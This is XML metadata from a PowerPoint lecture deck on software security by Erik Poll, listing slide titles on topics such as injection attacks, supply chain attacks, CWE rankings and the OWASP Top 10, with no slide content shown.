      <vt:lpstr>prevention vs detection &amp; reaction</vt:lpstr>
      <vt:lpstr>Three kinds of software &amp; security requirements</vt:lpstr>
      <vt:lpstr>How would you attack this website?</vt:lpstr>
      <vt:lpstr>Fun input to try</vt:lpstr>
      <vt:lpstr>Old-fashioned PHP attacks</vt:lpstr>
      <vt:lpstr>Fun files to upload </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Overlooked attack surfaces</vt:lpstr>
      <vt:lpstr>Overlooked attack surfaces:  2-nd order attacks</vt:lpstr>
      <vt:lpstr>Example: 2nd order SQL injection</vt:lpstr>
      <vt:lpstr>Other attack vectors,  besides these input possibilities?</vt:lpstr>
      <vt:lpstr>Other attack vectors,  besides these input possibilities?</vt:lpstr>
      <vt:lpstr>Other attack vectors</vt:lpstr>
      <vt:lpstr>closed source vs open source</vt:lpstr>
      <vt:lpstr>Supply chain attacks: NotPetya, MegaCart, Solarwinds, ...</vt:lpstr>
      <vt:lpstr>XZ-Utils supply chain attack (2024) </vt:lpstr>
      <vt:lpstr>npm supply chain attack (Sept 2025)</vt:lpstr>
      <vt:lpstr>npm supply chain attacks (Oct 2026)</vt:lpstr>
      <vt:lpstr> SBOM </vt:lpstr>
      <vt:lpstr> SCA </vt:lpstr>
      <vt:lpstr>  Classes of security vulnerabilities</vt:lpstr>
      <vt:lpstr> Classifications &amp; rankings of security flaws</vt:lpstr>
      <vt:lpstr>CWE Top 25     [2021]</vt:lpstr>
      <vt:lpstr>CWE Top 944  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Classifications of security flaws</vt:lpstr>
      <vt:lpstr>Memory corruption? </vt:lpstr>
      <vt:lpstr>Memory corruption </vt:lpstr>
      <vt:lpstr>Injection attacks?</vt:lpstr>
      <vt:lpstr>Injection attacks</vt:lpstr>
      <vt:lpstr>Access control?  (authentication + authorisation) </vt:lpstr>
      <vt:lpstr>Access control?  (authentication + authorisation)</vt:lpstr>
      <vt:lpstr>memory corruption, injection attacks, access control / authentication</vt:lpstr>
      <vt:lpstr>The big three</vt:lpstr>
      <vt:lpstr>Evolution of the OWASP Top 10</vt:lpstr>
      <vt:lpstr>Upwards trends</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>The big three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SoftwareSecurity1</dc:title>
  <dc:creator>Erik Poll</dc:creator>
  <cp:lastModifiedBy>Poll, E. (Erik)</cp:lastModifiedBy>
  <cp:revision>334</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-01-08T18:45:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-16T08:27:19Z</dcterms:modified>
</cp:coreProperties>
</file>